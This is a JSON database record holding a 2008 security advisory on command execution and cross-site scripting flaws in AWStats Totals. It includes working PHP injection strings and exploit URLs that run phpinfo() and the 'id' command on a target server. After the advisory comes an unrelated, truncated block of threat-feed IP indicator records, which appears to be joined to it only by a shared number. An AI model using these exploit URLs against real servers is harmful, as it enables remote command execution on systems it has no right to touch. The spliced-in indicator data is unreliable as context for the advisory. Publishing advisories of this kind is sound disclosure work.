{"id": "SECURITYVULNS:DOC:20412", "bulletinFamily": "software", "title": "Multiple Vulnerabilities in AWStats Totals", "description": "Emory University UTS Security Advisory EMORY-2008-01\r\n\r\nTopic: Multiple Vulnerabilities in AWStats Totals\r\n\r\nOriginal release date: August 26, 2008\r\n\r\nSUMMARY\r\n=======\r\n\r\nTelartis's AWStats Totals program is vulnerable to command execution\r\nand cross site scripting attacks. A remote attacker could exploit\r\nthese vulnerabilities to run arbitrary commands on the system with the\r\npermissions of the web server.\r\n\r\nAFFECTED SOFTWARE\r\n=================\r\n\r\n* AWStats Totals 1.0 - 1.14\r\n\r\nUNAFFECTED\r\n==========\r\n\r\n* AWStats Totals >= 1.15\r\n\r\nIMPACT\r\n======\r\n\r\nA remote attacker could exploit these vulnerabilities to run arbitrary\r\ncommands on the web server's host operating system.\r\n\r\nDETAILS\r\n=======\r\n\r\nAWStats Totals takes three URL parameters, "month," "year," and\r\n"sort," and uses them without checking them for validity.\r\n\r\nThe program uses the month and year parameters in output it displays\r\nto the user. It will display any HTML or Javascript code included in\r\nthese parameters, which the user's browser will then render.\r\n\r\nThe program uses the sort parameter to build an anonymous PHP function\r\nwith the create_function() function.\r\n\r\n> function multisort(&$array, $key) {\r\n> $cmp = create_function('$a, $b',\r\n> 'if ($a["'.$key.'"] == $b["'.$key.'"]) return 0;'.\r\n> 'return ($a["'.$key.'"] > $b["'.$key.'"]) ? -1 : 1;');\r\n> usort($array, $cmp);\r\n> }\r\n> \r\n> if ($sort == 'config') sort($rows); else multisort($rows, $sort);\r\n\r\nTaking care to match properly the quotes and angle brackets, it is\r\npossible to insert PHP expressions into the code for the function. For\r\nexample, to run the phpinfo() function, one might set sort to this\r\nvalue:\r\n\r\n"].phpinfo().$a["\r\n\r\nSince any code one injects gets run multiple times, however, it may be\r\nuseful to exit the program after a single invocation:\r\n\r\n"].phpinfo().exit().$a["\r\n\r\nIt is also possible to insert PHP expressions through the use of\r\nvariable expansion within strings on newer versions of PHP:\r\n\r\n{${phpinfo()}}{${exit()}}\r\n\r\nSOLUTION\r\n========\r\n\r\nUpgrade to AWStats Totals 1.15.\r\n\r\nhttp://www.telartis.nl/xcms/awstats/\r\n\r\nEXPLOIT\r\n=======\r\n\r\nThe following examples require that magic quotes be disabled, but will\r\nwork on all versions of PHP.\r\n\r\nThis example will display phpinfo().\r\n\r\nhttp://host.tld/some/path/awstatstotals.php?sort=%22%5d%2ephpinfo%28%29%2eexit%28%29%2e%24a%5b%22\r\n\r\nThis example will run the "id" command on the target system.\r\n\r\nhttp://host.tld/some/path/awstatstotals.php?sort=%22%5d%2epassthru%28%27id%27%29%2eexit%28%29%2e%24a%5b%22\r\n\r\n======\r\n\r\nThe following examples require a version of PHP which parses function\r\ncalls inside strings (5+, some versions of 4?), but will work if magic\r\nquotes are enabled.\r\n\r\nThis example will display phpinfo().\r\n\r\nhttp://host.tld/some/path/awstatstotals.php?sort=%7b%24%7bphpinfo%28%29%7d%7d%7b%24%7bexit%28%29%7d%7d\r\n\r\nThis example will run the "id" command on the target system.\r\n\r\nhttp://host.tld/some/path/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d\r\n\r\nACKNOWLEDGMENTS\r\n===============\r\n\r\nThanks to Telartis B.V. and Jeroen de Jong for quickly releasing an\r\nupdated version and for assisting with this advisory.\r\n\r\nDISCLAIMER\r\n==========\r\n\r\nThe information in this advisory is provided by Emory as a courtesy\r\nand without any representations or warranties. Recipients are\r\nadvised to conduct their own investigation and due diligence before\r\nrelying on its contents.\r\n\r\nREVISION HISTORY\r\n================\r\n\r\n2008-08-26 original release", "published": "2008-08-26T00:00:00", "modified": "2008-08-26T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20412", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:27", "edition": 1, "viewCount": 20, "enchantments": {"score": {"value": 3.1, "vector": "NONE", "modified": "2018-08-31T11:10:27", "rev": 2}, "dependencies": {"references": [{"type": "securelist", "idList": ["SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7"]}, {"type": "nessus", "idList": ["ALA_ALAS-2020-1364.NASL", "EULEROS_SA-2020-1563.NASL", "EULEROS_SA-2020-1591.NASL", "EULEROS_SA-2020-1555.NASL", "EULEROS_SA-2020-1527.NASL", "EULEROS_SA-2020-1547.NASL", "NEWSTART_CGSL_NS-SA-2020-0027_CHRONY.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201591"]}, {"type": "mskb", "idList": ["KB2559049", "KB2496326", "KB2979597", "KB2586448", "KB980195", "KB2647516"]}, {"type": "github", "idList": ["GHSA-R854-96GQ-RFG3"]}, {"type": "amazon", "idList": ["ALAS-2020-1364"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/SALTSTACK_SALT_ROOT_KEY"]}, {"type": "thn", "idList": ["THN:9F1824BD0EEB6A1695B53AE380D04BF9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157528"]}], "modified": "2018-08-31T11:10:27", "rev": 2}, "vulnersScore": 3.1}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}

{"rst": [{"id": "RST:28A124CF-6875-34FD-8C3A-012BB021B7BF", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 67.158.32.92", "description": "Found **67[.]158.32.92** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **38**.\n First seen: 2021-10-14T03:00:00, Last seen: 2021-10-22T03:00:00.\n IOC tags: **generic**.\nASN 20412: (First IP 67.158.22.0, Last IP 67.158.35.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 763 domains.\nGEO IP information: City \"Lead\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-10-23T00:00:00", "modified": "2021-10-14T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-10-22T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "5fa0262268392a9bef25f45ec96f9374"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "dc9402a3a5f0070083ff03e135e9d4f1"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "dc171ae63b62ba49107edb8c848f508b"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "ea2df28618c9280c1741af1ca5e07964"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "82ae89e9082f5dbdf1db3b592af54575"}, {"key": "modified", "hash": "7570521fc10627be56d7935693fccc14"}, {"key": "published", "hash": "ec8f309aaf165e5995cf2ed51d703d40"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "1fc19d5755e3cf71107002841345a1b8"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "6bf98650d8c60805113b11cf37ed4c12aad104f8c692b5dcec814b94f65be7d4", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["67.158.32.92"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.87, "ioc_src": 54.78, "ioc_tags": 0.8, "ioc_total": 38.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Lead", "country": "United States", "region": "South Dakota"}, "asn": {"cloud": "", "domains": 763, "firstip": {"netv4": "67.158.22.0", "num": "1134433792"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "67.158.35.255", "num": "1134437375"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": []}, {"id": "RST:95268BF4-F306-3DAA-A76D-3D4452197B7E", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 64.179.169.12", "description": "Found **64[.]179.169.12** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **6**.\n First seen: 2021-09-05T03:00:00, Last seen: 2021-10-22T03:00:00.\n IOC tags: **generic**.\nASN 20412: (First IP 64.179.152.0, Last IP 64.179.191.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 763 domains.\nGEO IP information: City \"Luverne\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-10-23T00:00:00", "modified": "2021-09-05T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-10-22T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "1c410fd111f92c83235d08931d001cf0"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "402331116775fc5cf9b4230d63a26f33"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "8c2570a733aa43c224e71bd1aa54bbbb"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "f54c94e35a4aff9963a7b1c8e750a670"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "6bc47db4235fe501c91dacfca597135f"}, {"key": "modified", "hash": "b71f26021aebc9cf104389ae17151803"}, {"key": "published", "hash": "ec8f309aaf165e5995cf2ed51d703d40"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "8f2dd90f09ec3e54c5f968c37babe42b"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "eb369e3535cb174437e0cc980b1b00c085c591e8ab1cb334c72ad077b782ee8a", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["64.179.169.12"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.5, "ioc_src": 16.44, "ioc_tags": 0.8, "ioc_total": 6.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Luverne", "country": "United States", "region": "Minnesota"}, "asn": {"cloud": "", "domains": 763, "firstip": {"netv4": "64.179.152.0", "num": "1085511680"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "64.179.191.255", "num": "1085521919"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": []}, {"id": "RST:27E984B4-60D7-391F-976D-9C3574D35488", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 209.159.229.85", "description": "Found **209[.]159.229.85** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **29**.\n First seen: 2021-09-21T03:00:00, Last seen: 2021-10-22T03:00:00.\n IOC tags: **shellprobe**.\nASN 20412: (First IP 209.159.216.0, Last IP 209.159.237.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 763 domains.\nGEO IP information: City \"Rapid City\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-10-23T00:00:00", "modified": "2021-09-21T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-10-22T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "b4d026fd7b144591c2d90e845b446c15"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "6be1d6fdbe2c82439abe72bf170c61ae"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "b24a857a501cad12c13fdcf3ab38c98e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "8773067d3a75163f20f7246c044b7126"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "7fa68f74309f60a6f3d0db31b403b744"}, {"key": "modified", "hash": "8950ba15320bd50ed904cede9029415a"}, {"key": "published", "hash": "ec8f309aaf165e5995cf2ed51d703d40"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "7804d0d7c594283c7ef18b84e4339474"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "5310d050aa32452872d7404bdb1b192c"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "953483a9c6925819ba31292311d5884fd4c674018274d890e9d9692eb80eded8", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["209.159.229.85"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.61, "ioc_src": 63.68, "ioc_tags": 0.75, "ioc_total": 29.0}, "tags": ["shellprobe"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Rapid City", "country": "United States", "region": "South Dakota"}, "asn": {"cloud": "", "domains": 763, "firstip": {"netv4": "209.159.216.0", "num": "3516913664"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "209.159.237.255", "num": "3516919295"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": []}, {"id": "RST:A2E309F4-2763-3B47-A9B9-7B3C30759835", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 209.159.242.88", "description": "Found **209[.]159.242.88** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **38**.\n First seen: 2021-10-03T03:00:00, Last seen: 2021-10-22T03:00:00.\n IOC tags: **tor_node**.\nASN 20412: (First IP 209.159.238.0, Last IP 209.159.255.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 763 domains.\nGEO IP information: City \"Spearfish\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-10-23T00:00:00", "modified": "2021-10-03T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-10-22T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "3981844e0914c428617e40b676d9d202"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "acbf1732eaa09355f5af1452368d6a81"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "ec740a899c02b7fcb4773bb5034ef15d"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "a6f7df90b6374262f18c4307eda140f5"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "ffc03e44c592908f7b6f827154aacc0e"}, {"key": "modified", "hash": "7776da3b9c0748d6ad9e5d6d003be60c"}, {"key": "published", "hash": "ec8f309aaf165e5995cf2ed51d703d40"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "c81bf62ee6dddcc2107700c6350e186e"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "440ef37e60213977161d28ad19511aaa"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "6e2dfd8ec34220ab3b2c415d5f7472820088821837b86d0934c0a317c1fea15c", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["209.159.242.88"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.73, "ioc_src": 69.69, "ioc_tags": 0.75, "ioc_total": 38.0}, "tags": ["tor_node"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Spearfish", "country": "United States", "region": "South Dakota"}, "asn": {"cloud": "", "domains": 763, "firstip": {"netv4": "209.159.238.0", "num": "3516919296"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "209.159.255.255", "num": "3516923903"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": []}, {"id": "RST:86BF2F51-34B2-3028-91B8-B5F07FC109D4", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 209.159.244.240", "description": "Found **209[.]159.244.240** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **2**.\n First seen: 2021-04-14T03:00:00, Last seen: 2021-10-12T03:00:00.\n IOC tags: **generic**.\nASN 20412: (First IP 209.159.238.0, Last IP 209.159.255.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 763 domains.\nGEO IP information: City \"Spearfish\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-10-13T00:00:00", "modified": "2021-04-14T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-10-12T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "3981844e0914c428617e40b676d9d202"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "299ec69c6e66c2d3c42ec53292473ae0"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "ec740a899c02b7fcb4773bb5034ef15d"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "ac23b4af51ac9724e1948e553de9ab3b"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "b046f5f572aa7f6bd837fb6ddc9bd69b"}, {"key": "modified", "hash": "5de7e5e1e6abd2986b5e1bda0f57aee4"}, {"key": "published", "hash": "367bec30c0ba4b1e1089ea2e16dc01df"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "751f1e8eb5e0be49a1ffe35d4adc89d6"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "7104fe7464f3cb96102c64d1cfb72f4a09539cdd20a896586e9e0ad240202fa8", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["209.159.244.240"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.16, "ioc_src": 16.44, "ioc_tags": 0.8, "ioc_total": 2.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Spearfish", "country": "United States", "region": "South Dakota"}, "asn": {"cloud": "", "domains": 763, "firstip": {"netv4": "209.159.238.0", "num": "3516919296"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "209.159.255.255", "num": "3516923903"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "RST:BFF9CD3F-36A5-3CF6-AF42-02C92916B2F7", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 67.158.4.116", "description": "Found **67[.]158.4.116** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **37**.\n First seen: 2021-09-29T03:00:00, Last seen: 2021-10-08T03:00:00.\n IOC tags: **generic**.\nASN 20412: (First IP 67.158.0.0, Last IP 67.158.7.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 763 domains.\nGEO IP information: City \"Lead\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-10-09T00:00:00", "modified": "2021-09-29T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-10-08T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "f077158b8441622c949d18cc353637e4"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "e8ead2f2106cb6ac459e1b249544894a"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "dc171ae63b62ba49107edb8c848f508b"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "a914504e1e2e5dd05b8a75a8ac969e3a"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "9454df1dfcf794fab69a62911b167110"}, {"key": "modified", "hash": "313d5da59520b89a5f685c7a384b8ba0"}, {"key": "published", "hash": "6e178d5b3444d8eafa36897d1d2980cb"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "0262ccb640c9974dbea4276af54a5a34"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "7c0a5a272ea32d85134ecc63e07e6554933add28d85bfbcf289666c07ec15cde", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["67.158.4.116"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.85, "ioc_src": 54.78, "ioc_tags": 0.8, "ioc_total": 37.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Lead", "country": "United States", "region": "South Dakota"}, "asn": {"cloud": "", "domains": 763, "firstip": {"netv4": "67.158.0.0", "num": "1134428160"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "67.158.7.255", "num": "1134430207"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": []}, {"id": "RST:74A8D9D6-C32E-36ED-96A9-4C6FADB85602", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 209.159.206.184", "description": "Found **209[.]159.206.184** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **48**.\n First seen: 2021-10-08T03:00:00, Last seen: 2021-10-08T03:00:00.\n IOC tags: **stealer**.\nASN 20412: (First IP 209.159.192.0, Last IP 209.159.215.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 763 domains.\nGEO IP information: City \"Rapid City\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-10-08T00:00:00", "modified": "2021-10-08T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-10-08T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "f4a53ab2d43c01ac9af87e39a3ecb655"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "dd498b75da52bc07366e4cca4290a382"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "b24a857a501cad12c13fdcf3ab38c98e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "90622ca3c624cb74442ceaf0521a7674"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "16d5b5ce08281d5039e943d25a43c5f8"}, {"key": "modified", "hash": "b7a3dc8d61f8415dec7fce4b44754fee"}, {"key": "published", "hash": "b7a3dc8d61f8415dec7fce4b44754fee"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "4eafbbb4b0f60ef08e937e4d265e586e"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "8f40d9aea3f8286a04a6b68c1953fe52"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "75f5901ad07d894034985dab103b7e03dd005e451f5b442a90827236aa8ed26c", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["209.159.206.184"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 54.78, "ioc_tags": 0.88, "ioc_total": 48.0}, "tags": ["stealer"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Rapid City", "country": "United States", "region": "South Dakota"}, "asn": {"cloud": "", "domains": 